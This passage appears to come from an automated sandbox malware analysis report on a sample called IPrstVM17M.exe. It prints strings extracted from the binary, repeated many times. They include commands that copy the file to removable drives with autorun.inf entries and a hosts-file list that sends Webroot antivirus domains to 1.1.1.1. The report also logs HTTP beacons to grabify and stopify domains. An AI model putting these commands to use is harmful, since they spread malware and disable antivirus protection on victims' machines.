sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.dr Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1

Networking
barindex
Queries Google from non browser process on port 80
Source: C:\Users\user\Desktop\IPrstVM17M.exe HTTP traffic: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: C:\Users\user\Desktop\IPrstVM17M.exe HTTP traffic: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.26.8.202 104.26.8.202
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppHost: stopify.coCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppCache-Control: no-cacheHost: grabify.worldConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: grabify.link
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: google.com
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: www.google.comCookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: unknown DNS traffic detected: queries for: stopify.co
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaV
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/7
